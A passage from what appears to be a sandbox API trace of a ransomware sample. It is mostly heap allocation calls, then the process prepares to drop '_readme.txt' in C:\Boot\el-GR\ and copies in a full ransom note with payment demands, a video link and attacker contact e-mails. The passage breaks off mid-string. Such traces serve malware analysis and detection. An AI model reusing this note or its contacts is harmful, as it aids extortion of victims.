(HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.907] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.907] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.907] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.907] PathFindFileNameW (pszPath="") returned="" [0127.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.908] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.908] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0127.908] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0127.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.909] FreeLibrary (hLibModule=0x759d0000) returned 1 [0127.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0127.909] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0127.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.909] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0127.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0127.909] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.909] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 